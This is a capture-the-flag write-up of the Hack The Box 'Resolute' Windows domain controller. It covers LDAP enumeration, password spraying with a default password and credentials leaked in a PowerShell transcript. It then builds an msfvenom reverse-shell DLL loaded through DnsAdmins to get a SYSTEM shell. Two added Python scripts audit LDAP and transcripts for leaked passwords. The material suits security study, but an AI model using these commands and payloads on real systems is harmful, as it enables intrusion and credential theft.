Port Scanning

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 19:33 CST
Warning: 10.10.10.169 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.169
Host is up (0.071s latency).
Not shown: 65474 closed tcp ports (reset), 37 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
49688/tcp open unknown
49712/tcp open unknown
50013/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds
┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49680,49681,49688,49712,50052 10.10.10.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 19:38 CST
Nmap scan report for 10.10.10.169
Host is up (0.074s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-13 11:34:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
50052/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/13%OT=53%CT=50052%CU=42043%PV=Y%DS=2%DC=I%G=Y%TM=
OS:66E42469%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=I%CI=I%II=I%S
OS:S=S%TS=A)SEQ(SP=104%GCD=1%ISR=10D%TI=I%CI=RD%II=I%SS=S%TS=A)OPS(O1=M53CN
OS:W8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M
OS:53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y
OS:%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A
OS:=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF
OS:=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=
OS:%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h16m35s, deviation: 4h02m32s, median: -3m26s
| smb2-time:
| date: 2024-09-13T11:35:43
|_ start_date: 2024-09-13T11:22:15
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-09-13T04:35:46-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.73 seconds

Found the domain name: megabank.local

Enum

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ dig any @10.10.10.169 megabank.local

; <<>> DiG 9.20.1-1-Debian <<>> any @10.10.10.169 megabank.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6199
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;megabank.local. IN ANY

;; ANSWER SECTION:
megabank.local. 600 IN A 10.10.10.169
megabank.local. 3600 IN NS resolute.megabank.local.
megabank.local. 3600 IN SOA resolute.megabank.local. hostmaster.megabank.local. 152 900 600 86400 3600
megabank.local. 600 IN AAAA dead:beef::b803:885a:b665:b183

;; ADDITIONAL SECTION:
resolute.megabank.local. 3600 IN A 10.10.10.169

;; Query time: 71 msec
;; SERVER: 10.10.10.169#53(10.10.10.169) (TCP)
;; WHEN: Fri Sep 13 19:46:42 CST 2024
;; MSG SIZE rcvd: 173

There do not seem to be any SMB shares we can connect to, so further enumeration is needed; try enumerating usernames.

I started with kerbrute, but the wordlist is fairly large and it ran slowly, so I tried enumerating through LDAP instead.

┌──(mikannse㉿kali)-[~/tools/domain/windapsearch]
└─$ python windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U >ldapresult
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.169
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=megabank,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None

[+] Enumerating all AD users
[+] Found 25 users:

cn: Guest

cn: DefaultAccount

cn: Ryan Bertrand
userPrincipalName: ryan@megabank.local

cn: Marko Novak
userPrincipalName: marko@megabank.local

cn: Sunita Rahman
userPrincipalName: sunita@megabank.local

cn: Abigail Jeffers
userPrincipalName: abigail@megabank.local

cn: Marcus Strong
userPrincipalName: marcus@megabank.local

cn: Sally May
userPrincipalName: sally@megabank.local

cn: Fred Carr
userPrincipalName: fred@megabank.local

cn: Angela Perkins
userPrincipalName: angela@megabank.local

cn: Felicia Carter
userPrincipalName: felicia@megabank.local

cn: Gustavo Pallieros
userPrincipalName: gustavo@megabank.local

cn: Ulf Berg
userPrincipalName: ulf@megabank.local

cn: Stevie Gerrard
userPrincipalName: stevie@megabank.local

cn: Claire Norman
userPrincipalName: claire@megabank.local

cn: Paulo Alcobia
userPrincipalName: paulo@megabank.local

cn: Steve Rider
userPrincipalName: steve@megabank.local

cn: Annette Nilsson
userPrincipalName: annette@megabank.local

cn: Annika Larson
userPrincipalName: annika@megabank.local

cn: Per Olsson
userPrincipalName: per@megabank.local

cn: Claude Segal
userPrincipalName: claude@megabank.local

cn: Melanie Purkis
userPrincipalName: melanie@megabank.local

cn: Zach Armstrong
userPrincipalName: zach@megabank.local

cn: Simon Faraday
userPrincipalName: simon@megabank.local

cn: Naoki Yamamoto
userPrincipalName: naoki@megabank.local


[*] Bye!

Export the result into a username wordlist

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ cat ldapresult |grep userPrincipalName |awk -F ' ' '{print $2}' |awk -F '@' '{print $1}' >username

With --full, every attribute is shown, so dump all of the users' attributes

┌──(mikannse㉿kali)-[~/tools/domain/windapsearch]
└─$ python windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U --full |grep Password
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 133707043313373976
description: Account created. Password set to Welcome123!

Found the initial default password: Welcome123!. Do a password spray with it.
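As an added example (not part of the original writeup), a Python script that parses windapsearch-style output like the above into a username list, the way the awk pipeline does, and audits free-text attributes such as description for text that mentions a password, which is the check a directory owner would run before anyone else does; the sample dump is constructed and the password is a placeholder.

```python
import re

# Constructed sample in the layout windapsearch prints (not the real dump from the box)
SAMPLE_LDAP_DUMP = """\
[+] Enumerating all AD users
[+] Found 3 users:

cn: Guest

cn: Ryan Bertrand
userPrincipalName: ryan@megabank.local
badPasswordTime: 0

cn: Marko Novak
userPrincipalName: marko@megabank.local
description: Account created. Password set to PLACEHOLDER_PW
badPasswordTime: 133707043313373976
"""

# Free-text attributes that admins tend to use as note fields, and words that signal a secret
NOTE_ATTRS = ("description", "info", "comment")
SECRET_WORDS = re.compile(r"\b(?:password|passwd|pwd|pass)\b", re.IGNORECASE)


def parse_entries(text):
    """Split windapsearch-style output into one dict of attributes per user entry."""
    entries, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):      # blank line ends an entry; [+] lines are tool chatter
            if current:
                entries.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")     # split on the first colon only; values may contain colons
        if sep:
            current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def usernames(entries):
    """Local part of each userPrincipalName, which is what the awk pipeline above extracts."""
    return [e["userPrincipalName"].split("@", 1)[0] for e in entries if "userPrincipalName" in e]


def find_leaked_credentials(entries):
    """Return (user, attribute, value) for note-style attributes whose text mentions a password."""
    hits = []
    for e in entries:
        user = e.get("userPrincipalName") or e.get("cn", "?")
        for attr in NOTE_ATTRS:
            value = e.get(attr)
            if value and SECRET_WORDS.search(value):
                hits.append((user, attr, value))
    return hits
```

Any hit means the value is readable by every account that can bind to the directory (here even an anonymous bind), so the password should be treated as compromised and the attribute cleared.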

Password Spray

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 -u username -p pass --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE

melanie:Welcome123!

┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ evil-winrm -i 10.10.10.169 -u 'melanie' -p 'Welcome123!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents>

Privilege Escalation

No special groups or privileges, so run winPEAS; in its results there is a suspicious PowerShell path

Time Running: 0:15
==|| PowerShell Registry Transcript Check


Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell


Name Property
---- --------
Transcription EnableTranscripting : 0
OutputDirectory : C:\PSTranscipts
EnableInvocationHeader : 0
*Evil-WinRM* PS C:\PSTranscripts> cmd /c dir /a
Volume in drive C has no label.
Volume Serial Number is D1AC-5AF6

Directory of C:\PSTranscripts

12/03/2019 07:32 AM <DIR> .
12/03/2019 07:32 AM <DIR> ..
12/03/2019 07:45 AM <DIR> 20191203
0 File(s) 0 bytes
3 Dir(s) 2,461,622,272 bytes free

There is a hidden directory, 20191203

*Evil-WinRM* PS C:\PSTranscripts\20191203> cmd /c dir /a
Volume in drive C has no label.
Volume Serial Number is D1AC-5AF6

Directory of C:\PSTranscripts\20191203

12/03/2019 07:45 AM <DIR> .
12/03/2019 07:45 AM <DIR> ..
12/03/2019 07:45 AM 3,732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
1 File(s) 3,732 bytes
2 Dir(s) 2,461,622,272 bytes free
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
<SNIP>
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

<SNIP>

This leaks a share on another server along with the password of the user ryan, so connect remotely again as ryan.

A look at whoami /groups shows that ryan is a member of the domain's DnsAdmins group, which can make the DNS service load an arbitrary DLL
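Added example, not from the original writeup: a Python scanner that pulls the captured commands out of a PowerShell transcript file and flags the ones that embed a credential, such as the net use line above, so that leaked passwords can be found and rotated before someone else reads the transcript; the excerpt is constructed and the passwords are placeholders.

```python
import re

# Constructed transcript excerpt in the layout of the file found above; passwords are placeholders
SAMPLE_TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups ryan PLACEHOLDER_PW"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c dir C:\\"
>> ParameterBinding(Invoke-Expression): name="Command"; value="net user svc_backup PLACEHOLDER_PW2 /add"
"""

# The transcript records each bound command as value="..."; the closing quote may be missing on truncated lines
VALUE_RE = re.compile(r'ParameterBinding\([^)]*\): name="Command"; value="(?P<cmd>.*?)"?\s*$')

# Command shapes that carry a password inline; (?!/) stops a following /switch from being taken as the password
SECRET_RULES = [
    ("net use with positional password", re.compile(r"\bnet\s+use\s+\S+\s+\\\\\S+\s+(?!/)\S+", re.I)),
    ("net user with password argument", re.compile(r"\bnet\s+user\s+\S+\s+(?!/)\S+", re.I)),
    ("/user: followed by inline password", re.compile(r"/user:\S+\s+(?!/)\S+", re.I)),
    ("ConvertTo-SecureString -AsPlainText", re.compile(r"ConvertTo-SecureString.*-AsPlainText", re.I)),
]


def extract_commands(transcript):
    """Yield (line_number, command) for every command the transcript captured."""
    for n, line in enumerate(transcript.splitlines(), 1):
        m = VALUE_RE.search(line)
        if m:
            yield n, m.group("cmd")


def find_secrets(transcript):
    """Return (line_number, rule_name, command) for captured commands that embed a credential."""
    hits = []
    for n, cmd in extract_commands(transcript):
        for name, rule in SECRET_RULES:
            if rule.search(cmd):
                hits.append((n, name, cmd))
                break          # one finding per command is enough
    return hits
```

The underlying fix on the host is the transcript OutputDirectory: it must not be readable by ordinary domain users, which is exactly what let melanie read ryan's session here.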

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

So generate a DLL that gives a reverse shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f dll -o rev.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd Resolute /config /serverlevelplugindll \\10.10.14.13\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns

SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns

SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3416
FLAGS :
┌──(mikannse㉿kali)-[~/HTB/resolute]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.169] 56664
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

I was stuck here for quite a while: a DLL uploaded to the machine itself does not seem to get executed, perhaps because Defender is present.

Closing Thoughts

A fairly simple box overall; the paths are all quite obvious. LDAP enumeration was still something new to me.